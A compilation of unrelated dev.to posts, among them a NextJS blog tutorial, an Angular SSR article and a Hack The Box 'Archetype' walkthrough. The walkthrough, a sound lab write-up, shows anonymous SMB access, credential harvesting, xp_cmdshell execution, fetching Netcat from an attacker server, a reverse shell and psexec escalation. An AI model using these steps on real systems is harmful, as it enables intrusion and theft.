1,917,884 | How to Create a Blog Using NextJS v14 and MDX: A Comprehensive Guide | It is very effective to develop a blog since it helps to showcase and share acquired knowledge,... | 0 | 2024-07-09T23:42:31 | https://www.ginos.codes/blog/create-blog-nextjs-mdx | webdev, react, nextjs, typescript | It is very effective to develop a blog since it helps to showcase and share acquired knowledge, pertinent experiences, and updates to a larger audience. More recently, I integrated a blog functionality on my web site with NextJS v14, MDX, and other libs. This blog post will guide you through the steps that I followed to incorporate the blog featuring updating parts, as well as configuring Next. js and also adding all the needed dependencies.
## Why I Chose to Blog
Therefore, experiencing real-life projects, I began this blog to give an open look into the work process and describe my thinking and actions when turning concepts into tangible products as well as my reasons for those actions. Being a developer myself, most of the time I dwell on projects where an application begins as a mere idea in the developer’s mind and in concrete reality in a fairly short time. Documenting this journey serves several purposes:
1. **🕵️♂️ Transparency**: To elaborate, the following paragraphs describe actions I choose to incorporate in ensuring that my projects are efficient and effective. For the aspiring developer on the one hand, oftentimes it is useful to observe how a more experienced coworker or a fellow student, as the case may be, is going about solving the problem.
2. **💡 Inspiration**: Sharing my motivations and the reasons behind my projects can inspire others to pursue their own ideas. Understanding the "why" behind a project often provides the fuel needed to push through challenges and stay committed.
3. **📚 Documentation**: Keeping a record of my development journey helps me track my progress and reflect on the lessons learned. It's a valuable resource for future reference and continuous improvement.
4. **🗣️ Community Engagement**: A blog makes it easy to have two-way communication, getting feedback from the readers. There is also interaction by making comments of different stories and articles to get new ideas, collaboration and fellowship from other readers.
My objective is to note down and share all the stages of idea formation and turning it into an actual project and thus motivate people sharing their ideas. It is my way of putting something back into the developer population and helping to build the knowledge base.
_So... How i did it?_
## Adding and Configuring the dependencies
Next.js supports MDX (Markdown for JSX) out of the box with some additional configuration. Here’s how I set it up:
### Install Required Packages
I installed the necessary MDX packages and related dependencies:
```bash
npm install @mdx-js/loader @mdx-js/react @next/mdx @tailwindcss/typography
```
#### Update `next.config.js`
We must add the withMDX plugin to the Next.js configuration file.
```tsx
// next.config.js
const withMDX = require("@next/mdx")();
const nextConfig = {
// Rest of the configuration
pageExtensions: ["js", "jsx", "mdx", "ts", "tsx"],
};
module.exports = withMDX(nextConfig);
```
</File>
#### Update `tailwindcss.config.ts`
I'm using tailwind so i must add the typography plugin to the tailwind config file.
```tsx
// tailwindcss.config.ts
const config = {
// Rest of the configuration
plugins: [require("@tailwindcss/typography")],
}
```
</File>
### Create required components to render the MDX
We will create a mdxComponents file that will allow us to define how each element of the MDX will be rendered.
```tsx
// components/MdxComponents.tsxx
import Link from "next/link";
import { MDXComponents } from "mdx/types";
import { Ref, RefAttributes } from "react";
import { Code } from "bright";
export const mdxComponents: MDXComponents = {
pre: (props) => (
<Code
theme={"github-dark"}
{...props}
style={{
margin: 0,
}}
/>
),
a: ({ children, ref, ...props }) => {
return (
<Link href={props.href || "."} ref={ref as Ref<HTMLAnchorElement> | undefined} {...props}>
{children}
</Link>
);
},
File: ({ children, path, ...props }) => {
return (
<div className="bg-gray-950 pt-1 rounded-3xl">
<div className="flex items-center ml-4 my-2 italic font-semibold">{path}</div>
{children}
</div>
);
},
};
export default mdxComponents;
```
</File>
For example in the code above, we are defining how the `pre` tag will be rendered, we are using the `Code` component from the `bright` library to render the code blocks with syntax highlighting. We are also defining how the `a` tag will be rendered, we are using the `Link` component from Next.js to render the links. We are also defining a custom `File` component that will render a file path above the code block.
_The File component is exactly what im using to render the code blocks in this blog post!_
Let's create the component to render the MDX!
```tsx
// components/BlogCard.tsxx
import { MDXRemote } from "next-mdx-remote/rsc";
import remarkGfm from "remark-gfm";
import rehypeSlug from "rehype-slug";
import rehypeAutolinkHeadings from "rehype-autolink-headings";
import remarkA11yEmoji from "@fec/remark-a11y-emoji";
import remarkToc from "remark-toc";
import mdxComponents from "./MdxComponents";
export default function BlogPost({ children }: { children: string }) {
return (
<div className="prose prose-invert min-w-full">
<MDXRemote
source={children}
options={{
mdxOptions: {
remarkPlugins: [
// Adds support for GitHub Flavored Markdown
remarkGfm,
// Makes emoji accessible ! adding aria-label
remarkA11yEmoji,
// generates a table of contents based on headings
[remarkToc, { tight: true }],
],
// These work together to add IDs and linkify headings
rehypePlugins: [rehypeSlug, rehypeAutolinkHeadings],
},
}}
components={mdxComponents}
/>
</div>
);
}
```
</File>
This is the component that will render the blog post, it uses the `MDXRemote` component from `next-mdx-remote/rsc` to render the MDX content. We also pass some options to the `MDXRemote` component to enable support for GitHub Flavored Markdown, accessible emojis, and table of contents generation. The `mdxComponents` object contains the components that will be used to render the MDX content.
### Create the logic to fetch the blog posts
We will define the types for the blog posts and create a function to fetch all the posts.
```tsx
// types.d.ts
export type IBlogPost = {
date: string;
title: string;
description: string;
slug: string;
tags: string[];
body: string;
};
```
</File>
We will store our `.mdx` files under the /posts path, and we will use the `gray-matter` library to parse the front matter of each file.
Create a file to define the functions to fetch all blog posts.
```tsx
// lib/blog.ts
import matter from "gray-matter";
import path from "path";
import fs from "fs/promises";
import { cache } from "react";
import { IBlogPost } from "@/types";
export const getPosts: () => Promise<IBlogPost[]> = cache(async () => {
const posts = await fs.readdir("./posts/");
return Promise.all(
posts
.filter((file) => path.extname(file) === ".mdx")
.map(async (file) => {
const filePath = `./posts/${file}`;
const postContent = await fs.readFile(filePath, "utf8");
const { data, content } = matter(postContent);
// Not published? No problem, don't show it.
if (data.published === false) {
return undefined;
}
return { ...data, body: content } as IBlogPost;
})
.filter((e) => e)
) as Promise<IBlogPost[]>;
});
export async function getPost(slug: string) {
const posts = await getPosts();
return posts.find((post) => post?.slug === slug);
}
export default getPosts;
```
</File>
The `getPosts` function reads all the files in the /posts directory, filters out the non-MDX files, and parses the front matter using `gray-matter`. It then returns an array of objects containing the post data and body content. The `getPost` function fetches a specific post based on its slug.
### Create a Blog Page
Now let's create the page where we wll display all the blog posts,
I created a group to be able to define a layout for the blog pages, you dont need to if you dont need it.
```tsx
// app/(blog)/blog/page.tsxx
// Here's where we will display all the blog posts
import BlogCard from "@/components/BlogCard";
import getPosts from "@/lib/blog";
export default async function PostPage() {
const posts = await getPosts();
return (
<>
<h1 className="text-5xl">
The <span className="font-bold">Blog</span>.
</h1>
<div className="flex flex-col space-y-10 mt-4 p-5">
<div>
<ol className="group/list">
{posts.map((post, i) => (
<li
className={`mb-12 animate-ease-in animate-delay-500 ${i % 2 == 0 ? "animate-fade-right" : "animate-fade-left"}`}
key={i}
>
{/* Remember to always define a key when doing a map function.*/}
<BlogCard {...post} key={i} />
</li>
))}
</ol>
</div>
</div>
</>
);
}
```
</File>
The `PostPage` component fetches all the blog posts using the `getPosts` function and maps over them to render a `BlogCard` component for each post. The `BlogCard` component will display the post title, description, and tags.
And then we can create the page for the specific post.
```tsx
// app/(blog)/[slug]/page.tsxx
import BlogPost from "@/components/BlogPost";
import getPosts, { getPost } from "@/lib/blog";
import { notFound } from "next/navigation";
export async function generateStaticParams() {
const posts = await getPosts();
return posts.map((post) => ({ slug: post?.slug }));
}
export default async function PostPage({
params,
}: {
params: {
slug: string;
};
}) {
const post = await getPost(params.slug);
if (!post) return notFound();
return <BlogPost>{post?.body}</BlogPost>;
}
```
</File>
The `PostPage` component fetches the specific post based on the slug provided in the URL. If the post is not found, it returns a 404 page using the `notFound` function from `next/navigation`. The `BlogPost` component renders the post content using the `MDXRemote` component.
### Create a Sitemap
Creating a sitemap is essential for search engine optimization (SEO) and helps search engines discover and index your website's pages. We can create a sitemap using a serverless function in Next.js.
```tsx
// app/sitemap.ts
import { getPosts } from "@/lib/blog";
export default async function sitemap() {
// Define the routes that should be included in the sitemap
const routes = ["", "/blog"].map((route) => ({
url: `https://ginos.codes${route}`,
lastModified: new Date().toISOString().split("T")[0],
}));
// Get all posts and create a sitemap route for each one
const posts = await getPosts();
const blogs = posts.map((post) => ({
url: `https://ginos.codes/blog/${post.slug}`,
lastModified: new Date(post.date).toISOString().split("T")[0],
}));
return [...routes, ...blogs];
}
```
</File>
The `sitemap` function defines the routes that should be included in the sitemap. It includes the homepage and the blog page. It then fetches all the blog posts and creates a sitemap route for each post, including the post URL and last modified date.
## Conclusion
In this guide, we covered the complete process of setting up a blog using NextJS v14 and MDX. From installing and configuring necessary dependencies to creating and displaying blog posts, each step is crucial for a functional and aesthetically pleasing blog. By following these steps, you can easily set up a blog that is not only easy to manage but also SEO-friendly. | pineapplegrits |
1,917,885 | The Evolution of Hand Surgery: Innovations and Contributions by SunMay Clinic | Introduction Hand surgery has advanced significantly over the years, playing a crucial role in... | 0 | 2024-07-09T23:49:34 | https://dev.to/sunmayclinic/the-evolution-of-hand-surgery-innovations-and-contributions-by-sunmay-clinic-cdc | socialmedia, mentalhealth, microsoftgraph | **Introduction**
Hand surgery has advanced significantly over the years, playing a crucial role in restoring hand function and improving quality of life for patients. SunMay Clinic in Astana stands at the forefront of these advancements, integrating cutting-edge technologies and personalized care to achieve remarkable results. This article explores the evolution of hand surgery, highlighting SunMay Clinic's innovative contributions and commitment to excellence in medical care.
**The Evolution of Hand Surgery**
Early Beginnings
The history of hand surgery dates back to ancient times when basic surgical techniques were used to treat injuries and deformities. Over the centuries, advancements in anesthesia, sterilization, and surgical techniques laid the foundation for modern hand surgery.
The Advent of Modern Hand Surgery
The 20th century witnessed significant advancements in hand surgery, driven by technological innovations and specialized surgical techniques. These developments enabled surgeons to address complex hand injuries, deformities, and conditions with greater precision and success rates.
Technological Advancements
SunMay Clinic has embraced technological advancements to enhance surgical outcomes and patient care. Advanced imaging technologies, such as MRI and CT scans, enable precise diagnosis and treatment planning. Microsurgery techniques allow for intricate procedures, such as nerve repair and tissue reconstruction, with minimal tissue damage and faster recovery times.
Specialized Care at SunMay Clinic
Comprehensive Treatment Approach
SunMay Clinic offers a comprehensive approach to hand surgery, tailored to meet the unique needs of each patient. From trauma care to reconstructive surgery and rehabilitation, our multidisciplinary team of specialists provides personalized treatment plans designed to achieve optimal outcomes.
Innovations by SunMay Clinic
SunMay Clinic is dedicated to pioneering excellence in hand surgery. Our innovations include:
Advanced Rehabilitation Programs: Tailored rehabilitation programs that promote recovery and restore hand function.
Minimally Invasive Techniques: Utilization of minimally invasive surgical techniques to minimize scarring and accelerate healing.
Patient-Centered Care: Emphasis on patient education and support throughout the treatment journey, ensuring informed decision-making and improved outcomes.
Success Stories
Numerous success stories at SunMay Clinic illustrate our commitment to patient care and surgical excellence. Patients like Victor, a professional musician who regained hand mobility after a severe injury, exemplify the transformative impact of our specialized treatments and dedicated care.
Conclusion
SunMay Clinic continues to lead the way in advancing hand surgery, driven by innovation, expertise, and a commitment to patient-centric care. As we look to the future, our focus remains on improving outcomes, enhancing quality of life, and pioneering new standards in hand surgical practice. | sunmayclinic |
1,917,886 | Bullshit Tech Roles (satire) | In any sufficiently well-funded or otherwise successful tech company, a set of new roles will... | 0 | 2024-07-09T23:50:55 | https://dev.to/anttiviljami/bullshit-tech-roles-satire-54f | satire, techjobs | In any sufficiently well-funded or otherwise successful tech company, a set of new roles will inevitably emerge—so crucial and revered by our industry that they've practically transcended the need to produce any tangible work. These roles specialize in the fine art of enabling others, in the hopes that, one day, the actual builders might be enabled enough to deliver products to customers.
I'm talking, of course, about the agile coaches and scrum masters, the architects and platform engineers; the growth hackers and data-driven researchers. These vanguards of innovation are vital to any team that wants to maintain a perpetual state of being maximally enabled, well-informed, and facilitated to perform their work.
Let's begin with the often underappreciated roles of agile coaches and scrum masters, the only people in a company actually certified™️ to set up the correct processes and tools to run an agile team. This, of course, is paramount for implementing agile—the popular software development philosophy that explicitly tells us to avoid focusing on processes and tools.
Agile coaches and scrum masters are professionals whose primary job is to ensure all work in teams is performed in sprints, with daily stand-up meetings to guarantee everyone is constantly enabled. This allows the velocity of a team to be meticulously measured in story points, which no one quite understands, but hey, at least we're definitely data-driven.
Surely, without their meticulous facilitation, teams would be left wandering aimlessly, unsure of how to break down their work into JIRA tickets. Their presence ensures that everyone stays aligned and that every team member is reminded of their blockers and sprint goals every single morning. Because nothing screams productivity like a daily stand-up where everyone takes turns saying, "no updates from my side."
Next, we have the architects. These exceptionally gifted, usually very senior engineers haven't touched any production code in the current decade. They are often found in their natural habitat, PowerPoint, where they sketch out their grand visions of future systems and envision platform rewrites for actual software engineers to implement.
Their role is to think so far ahead that their ideas become completely theoretical, creating software designs that are so advanced, they may never actually be implemented. But that's not the point. The point is to have a shared vision, to inspire, to draw boxes and lines that will one day guide the hands of actual engineers who might one day understand what they were trying to convey.
Then, there are the platform engineers. A demanding role with zero responsibility to deliver anything of value to customers. These unsung heroes dedicate their time to building and maintaining the internal tools and infrastructure that supposedly makes everyone else's job easier. Yet, their true skill lies in making things so complicated that only they can understand and manage them.
They manage infrastructure, design intricate CI/CD pipelines, common libraries and tools that add layers upon layers of necessary abstraction, which they insist must be adopted and standardized across all teams. The result? All teams having to learn and depend on custom in-house tools so complex that even the slightest changes require a detailed consultation with the platform team, ensuring their perpetual job security.
And then we have the growth hackers, the avant-garde marketers of the tech world. Their job is to come up with innovative ways to "hack" company growth, often resorting to questionable methods that straddle the line between clever marketing and outright deceit. They dive into data, running A/B tests, tweaking landing pages, and optimizing user funnels to squeeze out the tiniest incremental gains.
Of course, the real growth usually comes from the core product being genuinely useful, but why let that overshadow the need for an entire team devoted to marginal tweaks and vanity metrics?
Data-driven researchers are the prophets of the modern tech age. Armed with vast amounts of data and research, they uncover profound insights such as "users prefer faster load times" or "clearer buttons improve user engagement." Their work truly brings scientific rigor, managing to bring impressive-sounding numbers and great data visualizations to argue for any side of a decision, usually the one they already went with before doing any research.
These bullshit roles are the pillars upon which modern tech companies stand. They enable a culture where productivity is constantly measured, documented, and discussed, albeit often at the expense of actual productivity.
Without them, who would ensure that calendars get filled with back-to-back meetings so that everyone is too busy to notice no work is getting done? Who would write all the documents and Slack messages, ensuring no detail is left unshared or undiscussed? In doing so, these roles truly create a seamless, endless flow of communication, although one might argue that less talk and more doing might yield better results.
But where's the fun in that? | anttiviljami |
1,917,887 | Creating a Generative AI Chatbot with JavaScript | Introduction Generative AI has become a popular topic in the technology field over the past year.... | 0 | 2024-07-09T23:56:04 | https://dev.to/rodliraa/creating-a-generative-ai-chatbot-with-javascript-3flk | Introduction
Generative AI has become a popular topic in the technology field over the past year. Many developers are creating interesting projects using this technology. Google has developed its own generative AI model called Gemini.
In this article, we will build a simple ChatBot with Node.js and integrate Google Gemini. We will use the Google Gemini SDK for this purpose.
What is Gemini?
Google Gemini is an advanced AI model developed by Google AI. Unlike traditional AI models, Gemini is not limited to text processing. It can also understand and operate on various formats such as code, audio, images and video. This feature opens up exciting possibilities for your Node.js projects.
Setting Up the Environment
- Install Required Packages
To create a generative AI chatbot with JavaScript, you'll need to install the following packages using npm or yarn:

- Update package.json
Update your package.json file to include the type field:

- Replace API Key
Replace the API_KEY in your index.js file with your own API key from the Google API Studio.
Integrating Google Gemini
- Import Required Modules
Use ES6 import syntax for cleaner code:

- Initialize the Chatbot
Initialize the chatbot and set up the user input mechanism:

Customizing the User Interface
- Use ora and chalk
Customize the user interface with ora and chalk for a more responsive and user-friendly experience:

- Handle User Input
Handle user input and respond accordingly:

Running the Chatbot
Run the chatbot using Node.js:

Example Code
Here's a complete example of how to create a generative AI chatbot using JavaScript:

Conclusion
By following these steps, you can create a generative AI chatbot that integrates Google Gemini and provides a user-friendly interface. This chatbot can handle user input and generate responses using the Google Gemini AI model. | rodliraa | |
1,917,888 | Hack The Box — Archetype Walkthrough | This box gives exposure to: Protocols MSSQL SMB Powershell Reconnaissance Remote Code... | 0 | 2024-07-10T04:45:51 | https://dev.to/gabe-blog/hack-the-box-archetype-walkthrough-p5n | > This box gives exposure to:
> Protocols
> MSSQL
> SMB
> Powershell
> Reconnaissance
> Remote Code Execution
> Clear Text Credentials
> Information Disclosure
> Anonymous/Guest Access
Starting off with the ping command to verify that my machine can reach the target machine.
_Screenshot 1: Ping command_
**ping {target_ip_address}**
Additionally, when a packet is sent, it typically starts with an initial Time To Live (TTL) value set by the operating system (OS). By looking at the TTL of the packet we can GUESS the OS running on our target machine. Keep in mind that initial TTL values can be modified.
Common initial TTL values include:
> **Windows:** Initial TTL of 128.
> **Linux/Unix:** Initial TTL of 64.
> **Cisco routers:** Initial TTL of 255.
We also see that a Microsoft SQL Server is running on port 1433 with Microsoft Windows Server 2008.
Looking at the output of the ping command in Screenshot 1, we can see that the TTL is equal to 127, so we can also guess the target machine is running Windows.
_“But Gabe you just said that the TTL of Windows is 128 not 127 ☝🏽🤓”_
Note that each router that forwards the packet decreases the initial TTL value by one. By the time the packet arrives at its destination (our host machine), the TTL value will have been reduced by the number of hops it took to reach us. Meaning we can assume one hop from the target machine to our machine.
---
_Screenshot 2a: Nmap scan_
Time for some enumeration with Nmap. Here we are using the Nmap command to scan for any open TCP ports on our target machine using the following options:
***nmap -sC -sV -T4 {target_ip_address}***
> **-sC** (Default Script Scan): Runs a set of default Nmap Scripting Engine (NSE) scripts against the target. These scripts perform various tasks such as checking for common vulnerabilities, retrieving system information, and more.
> **-sV** (Version Detection): Tries to determine the version of the services running on open ports by sending various probes and analyzing the responses. This helps identify the specific software and version running on a port.
> **-T4** (Timing Template 4): Sets the timing template to “aggressive,” which speeds up the scan by reducing wait times between probes and increasing parallelization. It’s faster than the default but may increase the likelihood of detection and missed open ports.
---
_Screenshot 2b: Nmap scan cont._
Looking at the output of the initial Nmap scan in Screenshot 2b we can see that SMB ports are open. SMB uses either IP port 139 or 445.
> **Port 139:** SMB originally ran on top of NetBIOS using port 139. NetBIOS is an older transport layer that allows Windows computers to talk to each other on the same network.
> **Port 445:** Later versions of SMB (after Windows 2000) began to use port 445 on top of a TCP stack. Using TCP allows SMB to work over the internet.
We also see that a Microsoft SQL Server is running on port 1433 with Microsoft Windows Server 2008.
_“What’s SMB used for anyway?_☝🏽🤓_”_
**SMB (Server Message Block)** is a protocol used for sharing resources like files and printers on a network. Essentially, SMB makes it easy to share resources over a network, with Windows having it natively supported and Linux requiring a bit of setup with the open-source software suite, Samba.
Now we can use a tool called smbclient from the Impacket library, which is a powerful collection of Python classes for working with network protocols.
---
_Screenshot 3a: Smbclient enumeration_
**smbclient -N -L \\\\{target_ip_address}\\**
> **-N:** No password
> **-L:** This option allows you to look at what services / shares are available on a server
If we look at the output of the smbclient command in Screenshot 3a we are presented with a few notable shares. Running the following command we can try to access each share using the -N (No password) option followed by the target IP address and the Sharename.
---
_Screenshot 3b: Smbclient enumeration cont._
**smbclient -N \\\\{target_ip}\\{sharename}**
Once successfully connected to the backups share, I noticed a file named **prod.dtsConfig**. After using the get {filename} command to download the file to our host machine we exit our connection to the share.
---
_Screenshot 4: Clear text user credentials_
Back in our host machine we can use the cat command to display the output of **prod.dtsConfig** to our screen where we find our first set of clear-text credentials for a user **sql_svc** with a password of **M3g4C0rp123**.
_Screenshot 5: MSSQL user authentication using mssqlclient_
In Screenshot 5, we use a tool called mssqlclient (also from the Impacket library to authenticate to the SQL server where we can begin interacting with it.
**mssqlclient.py -windows-auth {domain/user}@{target_ip}**
> **-windows-auth:** Specifies to authenticate to the SQL Server using Windows authentication.
After running the command, we are prompted to enter the password for the sql_svc user which we found in previously in the **prod.dtsConfig**. Mssqlclient confirms that it has successfully connected to the SQL Server and changed the necessary settings. Shows the SQL Server version (Microsoft SQL Server 140 3232). We are then provided with an interactive SQL prompt (ARCHETYPE\sql_svc dbo@master) where we can enter and execute SQL commands directly on the server.
---
_Screenshot 6: Checking of our user’s role in the server_
In Screenshot 6, we are executing SQL queries to check our role and user identity.
**SELECT is_srvrolemember(‘sysadmin’)**
This SQL query checks if the current user is a member of the ‘sysadmin’ server role. Returns 1 if the user is a member of the ‘sysadmin’ role, 0 if not, and NULL if the role does not exist.
We receive a 1 back indicating that our current user is a member of the ‘sysadmin’ role.
We can also see below that we first tried to use the ‘whoami’ command directly into the SQL Server and we got back an error. This didn't work because ‘whoami’ is a command for the operating system, not for SQL Server. SQL Server didn’t recognize it and gave an error.
---
_Screenshot 7: Command execution on MSSQL server_
In Screenshot 7, we show that we can use the xp_cmdshell feature to correctly run the whoami command at the operating system level, allowing the SQL Server to run it and show the current domain\user.
---
_Screenshot 8: Checking current directory_
After checking for the name of our current user I also wanted to note the directory we were currently located in.
**xp_cmdshell ”powershell -c pwd”**
> **powershell:** This launches PowerShell, which is a powerful command-line shell and scripting language in Windows.
> **-c:** This tells PowerShell to execute the following command.
> **pwd:** This is a PowerShell command that stands for “print working directory”. It shows the current directory (folder) that PowerShell is operating in.
The output shows we are located at **C:\Windows\system32**.
_“But why does knowing the folder we’re located in matter ☝🏽🤓”_
Imagine you’re in a big office building, and someone asks you to find a specific file. If they tell you the file is in the accounting department’s office (a specific room), it’s much easier to locate the file. Similarly, knowing the current directory (**C:\Windows\system32**) tells you exactly where you are on the computer, so you can find or place files correctly.
---
_Screenshot 9: Checking for folders with write permissions_
Next, I wanted to take a look into our current user’s directory for a good place to drop a tool called nc64.exe with the following command:
**xp_cmdshell ”powershell -c dir C:\Users\sql_svc”**
Netcat, often abbreviated as “nc,” is a versatile networking tool that can read and write data across network connections. By dropping the Netcat tool on the target Windows machine, we can set up a way to connect to that remote computer’s command line. This allows us to run commands and check the system without being physically present.
---
_Screenshot 10: Setting up http server for netcat upload_
In screenshot 10, I start up a simple HTTP server on port 1337 on our host machine to make the current directory accessible over the network. This starts a server that will make our nc64.exe file available at http://<host_ip_address>:1337.
**sudo python -m http.server 1337**
> **sudo:** Allows you to run commands with superuser (administrator) privileges. It’s often needed for tasks that require higher permissions.
> **python -m http.server:** This part uses Python to start a simple HTTP server. Python has a built-in module called http.server that makes it easy to serve files over the web.
> **1337:** This specifies the port number on which the server will listen. Ports are like channels through which data is transmitted over the network. In this case, the server is using port 1337.
---
_Screenshot 11: Pulling netcat executable from out http server on port 1337_
**xp_cmdshell “powershell -c cd C:\Users\sql_svc\Downloads; wget http://{host_ip_address}:1337/nc64.exe -outfile nc64.exe”**
> **powershell:** You know what this does by now hopefully
> **-c:** Same here, if not scroll back to screenshot 8.
> **cd C:\Users\sql_svc\Downloads:** This changes the directory to C:\Users\sql_svc\Downloads where the file will be downloaded.
> **wget http://{host_ip_address}:1337/nc64.exe -outfile nc64.exe:** This uses the wget command to download a file from http://{host_ip_address}/nc64.exe and saves it as nc64.exe in the current directory.
We have now successfully dropped nc64.exe onto our target Windows machine.
---
_Screenshot 12: Setting up netcat listener_
**sudo nc -nvlp 4444**
> **sudo:** This command allows a permitted user to execute a command as the superuser or another user, as specified by the security policy. In this case, it runs the nc command with elevated privileges.
> **nc:** This is the Netcat utility, often referred to as the “Swiss Army knife” of networking. It can read and write data across network connections using the TCP/IP protocol.
> **-n:** This option tells Netcat not to do DNS lookups on the IP addresses, which speeds up the process.
> **-v:** This option enables verbose mode, providing more detailed output.
> **-l:** This option tells Netcat to listen for an incoming connection rather than initiate a connection.
> **-p 4444:** This specifies the port number that Netcat will listen on. In this case, we chose port 4444.
---
_Screenshot 13: Binding cmd.exe through our netcat listener_
**xp_cmdshell “powershell -c cd C:\Users\sql_svc\Downloads; .\nc64.exe -e cmd.exe {host_ip_address}:4444”**
> **powershell -c cd C:\Users\sql_svc\Downloads;**: This changes the directory to C:\Users\sql_svc\Downloads where the nc64.exe file is located.
> **.\nc64.exe -e cmd.exe 10.10.14.54 4444:** This runs the nc64.exe (Netcat) program with specific options:
> **-e cmd.exe:** This option tells Netcat to execute cmd.exe (Command Prompt) once a connection is established.
> **{host_ip_address} 4444:** These specify the IP address (10.10.14.54) and port (4444) to connect to. This is where the listener (from the previous screenshot) is waiting for connections.
---
_Screenshot 14: Reverse shell_
Here we have created what’s known as a “reverse shell”. A type of network connection where a computer (the “target”) initiates a connection to another computer (the listener) and gives control over its command line interface to us. Using the **whoami** command here shows we are executing commands directly on the target machine as **sql_svc**.
---
_Screenshot 15: User flag_
Taking a look into the user’s Desktop, we find a **user.txt** file. Using type user.txt we can see the contents of the file revealing our user flag.
---
_Screenshot 16: Checking PowerShell history to find clear text admin credentials_
In screenshot 16 we **cd **(change directory) into **Roaming\Microsoft\Windows\Powershell\PSReadline\** then output the contents of the directory with the dir command. The **ConsoleHost_history.txt** file within this directory stores command history. This means you can refer back to previous commands used by a user on the machine. Here is where we find our clear text admin credentials
---
_Screenshot 17: Privilege escalation via psexec.py_
In screenshot 17, we use psexec.py, a Python script that is part of the Impacket library, which provides a way to execute commands on remote Windows machines.
**psexec.py administrator@{target_ip_address}**
We can now enter the user (**administrator**) and password (**MEGACORP_4dm1n!!**) which we found from checking the console history.
Using **whoami** we see that we are working as **NT AUTHORITY\SYSTEM**, a built-in, highly privileged account that Windows uses to run essential system services and processes, with full control over the system.
---
_Screenshot 18: Root flag_
Checking the Administrator’s Desktop we find the second and final root flag.
| gabe-blog | |
1,917,889 | Forcing Angular SSR to Wait in 2024 | Angular has had a built-in way to wait on your functions to load, and you didn't know about it! ... | 17,607 | 2024-07-10T00:16:13 | https://dev.to/jdgamble555/forcing-angular-ssr-to-wait-in-2024-4lc9 | angular, webdev, javascript, async | Angular has had a built-in way to wait on your functions to load, and you didn't know about it!
## In the past...
You needed to import the hidden function...
```ts
import { ɵPendingTasks as PendingTasks } from '@angular/core';
```
Notice the greek letter that you wouldn't normally find with autocomplete.
## Today
It is experimental, but you will soon be able to just import `PendingTasks`.
```ts
import { ExperimentalPendingTasks as PendingTasks } from '@angular/core';
```
## Setup
I use my `useAsyncTransferState` function for hydration. This ensures an async call, a fetch in this case, only runs once, and on the server.
```ts
export const useAsyncTransferState = async <T>(
name: string,
fn: () => T
) => {
const state = inject(TransferState);
const key = makeStateKey<T>(name);
const cache = state.get(key, null);
if (cache) {
return cache;
}
const data = await fn() as T;
state.set(key, data);
return data;
};
```
## Token
We need reusable tokens for the `REQUEST` object.
```ts
// request.token.ts
import { InjectionToken } from "@angular/core";
import type { Request, Response } from 'express';
export const REQUEST = new InjectionToken<Request>('REQUEST');
export const RESPONSE = new InjectionToken<Response>('RESPONSE');
```
We must pass the request object as a provider in our render function.
```ts
// main.server.ts
export default async function render(
url: string,
document: string,
{ req, res }: { req: Request; res: Response }
) {
const html = await renderApplication(bootstrap, {
document,
url,
platformProviders: [
{ provide: REQUEST, useValue: req },
{ provide: RESPONSE, useValue: res },
],
});
return html;
}
```
Angular is currently in the process of [adding all of these features](https://github.com/angular/angular/discussions/56785), and potentially endpoints!!!!! 😀 😀 😀 🗼 🎆
### Fetch Something
Because endpoints are not currently there, I am testing this with Analog. Here is a `hello` endpoint that takes 5 seconds to load.
```ts
import { defineEventHandler } from 'h3';
export default defineEventHandler(async () => {
const x = new Promise((resolve) => setTimeout(() => {
resolve({
message: "loaded from the server after 5 seconds!"
});
}, 5000));
return await x;
});
```
## Test Component
Here we use the `request` in order to get the host URL. Then we use `useAsyncTransferState` to ensure things only run on the server, and only once. Finally, we use `pendingTasks` to ensure the component is not fully rendered until the async completes.
```ts
import { AsyncPipe } from '@angular/common';
import {
Component,
ExperimentalPendingTasks as PendingTasks,
inject,
isDevMode
} from '@angular/core';
import { REQUEST } from '@lib/request.token';
import { useAsyncTransferState } from '@lib/utils';
@Component({
selector: 'app-home',
standalone: true,
imports: [AsyncPipe],
template: `
<div>
<p class="font-bold">{{ data | async }}</p>
</div>
`
})
export default class HomeComponent {
private pendingTasks = inject(PendingTasks);
protected readonly request = inject(REQUEST);
data = this.getData();
// fetch data, will only run on server
private async _getData() {
const schema = isDevMode() ? 'http://' : 'https://';
const host = this.request.headers.host;
const url = schema + host + '/api/hello';
const r = await fetch(url, {
headers: {
'Content-Type': 'application/json',
}
});
const x = await r.json();
return x.message;
}
// fetch data with pending task and transfer state
async getData() {
const taskCleanup = this.pendingTasks.add();
const r = await useAsyncTransferState('pending', async () => await this._getData());
taskCleanup();
return r;
}
}
```
## Pending Task
Pending Task is very simple.
```ts
// create a new task
const taskCleanup = this.pendingTasks.add();
// do something async
const r = await fn();
// let Angular know it can render
taskCleanup();
```
Thats it! Bingo Shabongo!
**Repo:** [GitHub](https://github.com/jdgamble555/pending-tasks)
**Demo:** [Vercel Edge](https://pending-tasks.vercel.app/) - Takes 5s to load!
## Should you use this?
Nope! Seriously, don't use this.
After going down the rabbit hole for years on Angular async rendering (read the old posts in this chain), it is definitely best practice to put ALL async functions in a `resolver`. The resolver MUST load before a component, which is a much better development environment. The only exception would be `@defer` IMHO.
However, there are some edge cases where it makes sense for your app. The is particularly evident when you don't want to rewrite your whole application to use resolvers. Either way, you need to be aware of your options!
J
| jdgamble555 |
1,917,890 | Day 987 : Side Quest | liner notes: Professional : Had a meeting to start my day. Responded and researched some community... | 0 | 2024-07-10T00:18:57 | https://dev.to/dwane/day-987-side-quest-273c | hiphop, code, coding, lifelongdev | _liner notes_:
- Professional : Had a meeting to start my day. Responded and researched some community questions. Added some functionality to an application I've been refactoring to use a new version of an SDK. Had another meeting. Then I did some more refactoring and then called it a day.
- Personal : Went through some tracks for the radio show. Went on a long side quest researching possibly buying a new backpack for when I travel. I looked at different manufacturers. I even watched review videos that were in different languages and relied on translated captions. haha I made a decision, but waiting to see what happens with the Samsung Galaxy Unpacked event happening on Wednesday to see if I'll have any money left after the announcements. haha. Ended the night watching an episode of "Demon Slayer".

Going to work on the radio show some more. May do some quick research on the travel backpack again. I need to figure out what I actually need to code to finish up this side project. Probably write up a list. I've got one more episode of "Demon Slayer" to watch before I catch up and that last episode... wow!
Have a great night!
peace piece
Dwane / conshus
https://dwane.io / https://HIPHOPandCODE.com
{% youtube J5T3yrByOiU %} | dwane |
1,917,931 | Framer Motion | Introduction - Part 1 | Introduction Framer Motion is a library that allows you to easily add animations to your React... | 0 | 2024-07-10T00:33:12 | https://dev.to/boraacici/framer-motion-introduction-part-1-4858 | react, javascript, webdev, tutorial | **Introduction**
